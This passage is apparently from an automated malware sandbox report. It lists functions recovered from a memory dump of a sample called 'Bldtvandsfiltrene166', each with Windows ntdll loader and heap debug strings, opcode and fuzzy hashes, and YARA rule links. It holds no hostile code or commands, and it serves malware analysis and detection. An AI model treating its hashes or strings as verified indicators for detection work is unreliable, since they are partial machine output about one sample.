Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 38697db8814b48d019f1798bdd20901ef96628af191ef6f68dd75bedda9304e3
Instruction ID: cec4d3c86d55d50bd95a709cc75a0f9f61959083308b5cd37b2309732c37c8a3
Opcode Fuzzy Hash: 38697db8814b48d019f1798bdd20901ef96628af191ef6f68dd75bedda9304e3
Instruction Fuzzy Hash: 83A23875A0562ACFDB68CF18C889B9ABBB5AF45304F2142E9D919A7750DB309FC1CF01

Function 211A63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 211E41FE
Delaying execution failed with status 0x%08lx, xrefs: 211E4258
Process initialization failed with status 0x%08lx, xrefs: 211E413A
minkernel\ntdll\ldrinit.c, xrefs: 211E40E9, 211E414B, 211E420F, 211E4269
_LdrpInitialize, xrefs: 211E40DF, 211E4141, 211E4205, 211E425F
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 211E40D8

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 895a66ffa1f5d70729bd086bafa7e63024faa9c023af2525fe43ca0559016537
Instruction ID: 9a3ad2a776f9e41f815a56d3208d37fe21dd08d5ee329807706488e46fc646ad
Opcode Fuzzy Hash: 895a66ffa1f5d70729bd086bafa7e63024faa9c023af2525fe43ca0559016537
Instruction Fuzzy Hash: 97917771A00B52DFEB19CF90D889B9A3FA5AF567A8F01402CE518AB7C0D7789B01C7D1

Function 211A2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 211E21BF
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 211E219F
RtlGetAssemblyStorageRoot, xrefs: 211E2160, 211E219A, 211E21BA
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 211E2178
SXS: %s() passed the empty activation context, xrefs: 211E2165
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 211E2180

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 2407ff8ff38496bc6b6d87af00617c23ad55797938ae59f72cdf5a246ae72b49
Instruction ID: d8aba83b1c8b05989004fc4d0d0ea664d5e1d640d73f0fd7736f65f2af03bb8b
Opcode Fuzzy Hash: 2407ff8ff38496bc6b6d87af00617c23ad55797938ae59f72cdf5a246ae72b49
Instruction Fuzzy Hash: BD31063AA00615BBE7298FD58C95F9A7F78DF66A90F120059FA0867244D230DB00C7A1

Function 211AC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Loading import redirection DLL: '%wZ', xrefs: 211E8170
Unable to build import redirection Table, Status = 0x%x, xrefs: 211E81E5
minkernel\ntdll\ldrredirect.c, xrefs: 211E8181, 211E81F5
minkernel\ntdll\ldrinit.c, xrefs: 211AC6C3
LdrpInitializeImportRedirection, xrefs: 211E8177, 211E81EB
LdrpInitializeProcess, xrefs: 211AC6C4

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 696272df26eb2eed7630424baa9253c2bd6ffd339a6969521468cece27806fd0
Instruction ID: a3f0560f342970349ebc5c5e2e8c39ec7e09b5904ee02377c20ef8ff49ded1fb
Opcode Fuzzy Hash: 696272df26eb2eed7630424baa9253c2bd6ffd339a6969521468cece27806fd0
Instruction Fuzzy Hash: 453123B1644B46AFD314DF68C989E1B7BD4EF90B18F010568F8586B391E630EF04C7A2

Function 21180770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 211D50CA
HEAP: , xrefs: 211D50BD
HEAP[%wZ]: , xrefs: 211D50AE

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 271311cce6e0b2c3aed9620d9e70c0b3cb973098b982349d0dca3db42e333b28
Instruction ID: 31d546963dc2148c99c47af2a9f3901f0d9bd81415d29d936bfaceed2b8bd787
Opcode Fuzzy Hash: 271311cce6e0b2c3aed9620d9e70c0b3cb973098b982349d0dca3db42e333b28
Instruction Fuzzy Hash: E9F19C71A0060ADFE715CF68C890FAAB7B5FB46304F128268E5559B391D734EB81CF91

Function 21190BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 21190CDC

Strings

minkernel\ntdll\ldrinit.c, xrefs: 211DA121
LdrpCheckModule, xrefs: 211DA117
Failed to allocated memory for shimmed module list, xrefs: 211DA10F

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: 6a11a70c00468f2958729ee62e3cd7609f1b21290e1cb31b725055dad22e568a
Instruction ID: 64e7a0b3ee9574defcf24412dcbffa73a0a369bd0e381548a904b21c951ca0c7
Opcode Fuzzy Hash: 6a11a70c00468f2958729ee62e3cd7609f1b21290e1cb31b725055dad22e568a
Instruction Fuzzy Hash: AD71D171A00245DFDB09DF68C984AAEB7F8FB44704F15806DE525E7291E734AF41CB91

Function 211AC720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 211AC7BF

Strings

Failed to reallocate the system dirs string !, xrefs: 211E82D7
minkernel\ntdll\ldrinit.c, xrefs: 211E82E8
LdrpInitializePerUserWindowsDirectory, xrefs: 211E82DE

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: d1771dff8cd643dd7fcaf82ab77e896c55fe466c7308fe6ff312dde7cb9d64be
Instruction ID: c949c170164f45eecad4bba8a0ef3bddd415afa5f283a08c49e977cc45862721
Opcode Fuzzy Hash: d1771dff8cd643dd7fcaf82ab77e896c55fe466c7308fe6ff312dde7cb9d64be
Instruction Fuzzy Hash: 2F4145B5584745AFD711DFA4CD88B8B7BE8EF44754F01842AF948D32A0EB38DA00CB91

Function 211F4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 211F4809

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 211F4899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 211F4888
LdrpCheckRedirection, xrefs: 211F488F

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: a7c82a74d368a90cca7819941a248935a5f1130bd6486bc5d150342ef8f97325
Instruction ID: 405f3942de201ee190516eec780fc979f02495d0a5e1780f26b2a64e8ce5999f
Opcode Fuzzy Hash: a7c82a74d368a90cca7819941a248935a5f1130bd6486bc5d150342ef8f97325
Instruction Fuzzy Hash: 2B41A332A047519FCB11CF99C842A567BE8FF8A650F06065DFD8897B65D734DA00CB91

Function 211B096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 211B2DF0: LdrInitializeThunk.NTDLL ref: 211B2DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 211B0BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 211B0BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 211B0D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 211B0D74

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 2232e5a1bdd60413a7d52e624a568ce8f52244c0cd58d573c16e689cd540d283
Instruction ID: 08309ef64d5188820d1bc8fe49c1402f6bcce73a310cc124e3da6f17a2fa6f95
Opcode Fuzzy Hash: 2232e5a1bdd60413a7d52e624a568ce8f52244c0cd58d573c16e689cd540d283
Instruction Fuzzy Hash: 63426A71900719DFDB61CF68C880BAAB7F5BF45304F0445A9E989EB246E770AB84CF61

Function 211704E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 2117055E

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2117063D
kLsE, xrefs: 21170540

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: bdcc190b6472e30443f1327aca00fc85e89223bf2ecb3657c8fde1fe135996c1
Instruction ID: d93851d2a03b825435c4ed0386f32604b320464b09baec8781801d6d4a80c059
Opcode Fuzzy Hash: bdcc190b6472e30443f1327aca00fc85e89223bf2ecb3657c8fde1fe135996c1
Instruction Fuzzy Hash: 62517A715047429FD315DF64C5906D7BBF4AF86304F10883EEAAA87381E774A746CB92

Function 2117A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 2117A3EF
6, xrefs: 2117A3F7
8, xrefs: 2117A3E7
LdrResFallbackLangList Exit, xrefs: 2117A3FF

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 0a04efcf7d213593a245c019f7c0abd9a53cb5e86e87a9ff9e140c8aab6c9bff
Instruction ID: 71d6a6e96e56d41c0deba65310e595d5382a33de280a6cc2f719b5ad34914df2
Opcode Fuzzy Hash: 0a04efcf7d213593a245c019f7c0abd9a53cb5e86e87a9ff9e140c8aab6c9bff
Instruction Fuzzy Hash: 91C167711083828FD715CF54D840B9ABBF8AF89704F08896EF9958B391E735DB4ACB52

Function 211A8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 211A8591
minkernel\ntdll\ldrinit.c, xrefs: 211A8421
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 211A855E
LdrpInitializeProcess, xrefs: 211A8422

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 9de5b93d3f732f5493fd4ee2a36ae0525bcf3ba3d035cca5edf79b1c55e66f25
Instruction ID: 5249dd7570ae968b009fa1d4c3b68df52347b7b78bedbf7e5329b5f97c4c337b
Opcode Fuzzy Hash: 9de5b93d3f732f5493fd4ee2a36ae0525bcf3ba3d035cca5edf79b1c55e66f25
Instruction Fuzzy Hash: 35917C75508345AFD761DF61CD84FABBAECAF84788F40492EFA8492151E734DB04CBA2

Function 211A273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 211E21D9, 211E22B1
SXS: %s() passed the empty activation context, xrefs: 211E21DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 211E22B6
.Local, xrefs: 211A28D8

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 1eddc1e76615d1774207529e0a4a4f740998664efec59e740b3e7ca4eace4e93
Instruction ID: 9b11dc09929892e2b7eab7351e3dd926c4e9243b127f55a7d9db72c452878175
Opcode Fuzzy Hash: 1eddc1e76615d1774207529e0a4a4f740998664efec59e740b3e7ca4eace4e93
Instruction Fuzzy Hash: 12A1A03590022A9FDB28CFA4C888BD9BBB5BF59754F2541E9D908A7251E7309F80CF91

Function 211764AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 211D10AE
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 211D0FE5
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 211D1028
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 211D106B

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: ee341798513938ee8614ec6df50d336cfdc34a6b584fb7d9eea22d600c2a0450
Instruction ID: 47bb86d345b30e77049038827678be9a1cf77627f84f1922c1c6af67a942b1a0
Opcode Fuzzy Hash: ee341798513938ee8614ec6df50d336cfdc34a6b584fb7d9eea22d600c2a0450
Instruction Fuzzy Hash: E471DDB29043469FD751CF14C884F8B7FA8AF957A4F400468F9488B286D735D789DBD2

Function 211829A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 21183264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 2118327D
HEAP[%wZ]: , xrefs: 21183255

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 0dffa63101ecb2fca6b73157d067f76352f5e7b8ee6cb71bb583b5a0b59f753c
Instruction ID: 5bb99cfa32a18168691629e1d16594a33162364986af1f1ece4f87884cd2c912
Opcode Fuzzy Hash: 0dffa63101ecb2fca6b73157d067f76352f5e7b8ee6cb71bb583b5a0b59f753c
Instruction Fuzzy Hash: 1A92AC70A046499FEB1ACF68C440BAEBBF1EF09304F1AC09DE855AB391D735AA45CF51

Function 21196962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 211DCA51
@, xrefs: 21196C24

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 372529ef8d56e6a7ecfaae01f2001a02d14ff303edfaf3e3e58190ba8509d621
Instruction ID: 1b394c2f216b7b07f6e736d5016428550f59f466d1f83d690113d016e240ef8c
Opcode Fuzzy Hash: 372529ef8d56e6a7ecfaae01f2001a02d14ff303edfaf3e3e58190ba8509d621
Instruction Fuzzy Hash: 0EC2AE726083858FE725CF24C881B9BBBE5AF89754F058D2DF998C7241E734DA05CB92

Function 2116A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 2116A1C1
FilterFullPath, xrefs: 211CC2E6
\??\, xrefs: 211CC1E4

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 39cbfeb0839fa610975f3f9232f49546d85c7d97435a161e18c20644081e8bc9
Instruction ID: 46a3db836525c041911c51325e068a2420108533d49a2d5006b5956e55bf0311
Opcode Fuzzy Hash: 39cbfeb0839fa610975f3f9232f49546d85c7d97435a161e18c20644081e8bc9
Instruction Fuzzy Hash: 2EA168719112299FDB21DF24CC88BDAB7B8EF59B14F0041EAEA08A7260D7359F84CF51

Function 21180A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 211D5342
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 211D534D
HEAP[%wZ]: , xrefs: 211D5335

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: caf541cc65de3d7181c634590f4c30cf24a43d80c873e15bca63c4bb2ee151d8
Instruction ID: c63ddf66180f9fc175ccc2c93da8b45b6c38868455d3cac320acdfaccdd544b5
Opcode Fuzzy Hash: caf541cc65de3d7181c634590f4c30cf24a43d80c873e15bca63c4bb2ee151d8
Instruction Fuzzy Hash: 4361DC71600345AFE759CF24C480BAABBF5FF45304F12C66AE4598B292D770EA81CF91

Function 2122C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 2122C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 2122C1C5
PreferredUILanguages, xrefs: 2122C212

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: f7b614b43be69d9403b3725564bfa806f7a6872f0802a0cf8d46354af0d3bfe2
Instruction ID: 681519d2a352a6ba165e30f317a111106fa624de76264ee6dcf82d1b6797ea44
Opcode Fuzzy Hash: f7b614b43be69d9403b3725564bfa806f7a6872f0802a0cf8d46354af0d3bfe2
Instruction Fuzzy Hash: 2341507191060EAFDB41CFE5CC81FDEBBBCAB16714F10416AFA09A7240DB759B548B50

Function 21204144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 21204225
LdrpResValidateFilePath Enter, xrefs: 21204160
LdrpResValidateFilePath Exit, xrefs: 21204172

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
